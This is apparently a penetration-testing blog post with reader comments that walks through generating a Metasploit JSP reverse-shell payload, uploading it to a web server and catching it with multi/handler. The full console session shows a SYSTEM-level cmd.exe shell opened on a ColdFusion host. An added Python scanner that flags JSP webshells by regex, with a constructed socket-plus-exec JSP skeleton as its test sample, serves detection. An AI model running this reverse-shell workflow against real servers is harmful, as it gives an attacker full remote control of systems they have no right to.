http://dev.metasploit.com/redmine/projects/framework/repository/show/modules/payloads/singles/java
I'm not sure of all the ways to use them, but the easiest way is to just output the shell as raw and upload it to a web server; for an example of using one with an exploit, check out the Adobe RoboHelp exploit.
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/http/adobe_robohelper_authbypass.rb
yomomma@c0:~/pentest/msf3.
From there you can set up your multi/handler, browse to your page at webpath/blah.jsp, and grab your shell.
yomomma@c0:~/pentest/msf3.
=[ msf v3.3-dev [core:3.3 api:1.0]
+ -- --=[ 432 exploits - 261 payloads
+ -- --=[ 21 encoders - 8 nops
=[ 222 aux
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
set PAYLOAD java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf exploit(handler) > info
Name: Generic Payload Handler
Version: 6558
Platform: Windows, Linux, Solaris, Unix, OSX, BSD, PHP
Privileged: No
License: Metasploit Framework License (BSD)
Provided by:
hdm
Available targets:
Id Name
-- ----
0 Wildcard Target
Payload information:
Space: 100000
Avoid: 0 characters
Description:
This module is a stub that provides all of the features of the
Metasploit payload system to exploits that have been launched
outside of the framework.
msf exploit(handler) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (java/jsp_shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.10.1 yes The local address
LPORT 4444 yes The local port
SHELL cmd.exe yes The system shell to use.
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started reverse handler
[*] Command shell session 1 opened ( 192.168.10.1:4444 -> 192.168.10.2:42957)
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\ColdFusion8\runtime\bin>
whoami
nt authority\system
C:\ColdFusion8\runtime\bin>
exit
[*] Command shell session 1 closed.
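What this whole post leaves on the target is a .jsp in the webroot that spawns cmd.exe and connects back, and both calls sit in plain view in its source. The scanner below is an added example for spotting such files in a deployed webroot; it is not code from the post or from Metasploit, and both JSP samples are constructed (203.0.113.5 is a documentation placeholder address).

```python
import re
from typing import Dict, List

# Source-level indicators of a JSP that can act as a shell. A scriptlet that
# both spawns a process and opens a raw socket is the shape of the reverse
# shell above; exec on its own is still worth a look (cmd/bind shells).
INDICATORS = {
    "process_exec": re.compile(
        r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(|new\s+ProcessBuilder\s*\("),
    "raw_socket": re.compile(
        r"new\s+(?:java\.net\.)?(?:Socket|ServerSocket)\s*\(|SocketChannel\s*\.\s*open\s*\("),
    "shell_binary": re.compile(r"cmd\.exe|/bin/(?:ba)?sh", re.IGNORECASE),
}

def scan_jsp(source: str) -> Dict[str, List[int]]:
    """Map each indicator that fires to the 1-based lines where its match starts."""
    # Match over the whole file, not per line, so a call split across lines
    # (getRuntime() on one line, .exec( on the next) is still caught.
    hits: Dict[str, List[int]] = {}
    for name, pattern in INDICATORS.items():
        for m in pattern.finditer(source):
            hits.setdefault(name, []).append(source.count("\n", 0, m.start()) + 1)
    return hits

def classify(hits: Dict[str, List[int]]) -> str:
    """Turn raw indicator hits into a triage verdict."""
    if "process_exec" in hits and "raw_socket" in hits:
        return "likely-reverse-shell"
    if "process_exec" in hits:
        return "suspicious-exec"
    return "clean"

# Constructed samples, not taken from any real deployment. The second is only
# the tell-tale skeleton: a socket plus a process spawn, no I/O plumbing.
BENIGN_JSP = """<%@ page import="java.util.Date" %>
<html><body>Server time: <%= new Date() %></body></html>
"""
SUSPICIOUS_JSP = """<%@ page import="java.io.*,java.net.*" %>
<%
    Socket s = new Socket("203.0.113.5", 4444);
    Process p = Runtime.getRuntime().exec("cmd.exe");
%>
"""

if __name__ == "__main__":
    for name, src in (("index.jsp", BENIGN_JSP), ("blah.jsp", SUSPICIOUS_JSP)):
        hits = scan_jsp(src)
        print(f"{name}: {classify(hits)} {hits}")
```

Run it over every .jsp under the webroot of an app like the ColdFusion instance shown above; a hit on a file nobody deployed is the thing to chase.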
Hi! I just have to say great work on this blog! This is the first time I got some problems getting this to work. I start the payload and the multi handler and upload the blah.jsp to my webserver. But when I try to connect with my "victim" machine to "webserver/blah.jsp" I only get the "download window" opened, or in Firefox I get the source code of the .jsp.
What am I doing wrong? Should I make a <script language="javaScript">(blah.jsp) source code</script>? Or what? Keep up the good work, Peace
Does the webserver know how to handle .jsp pages?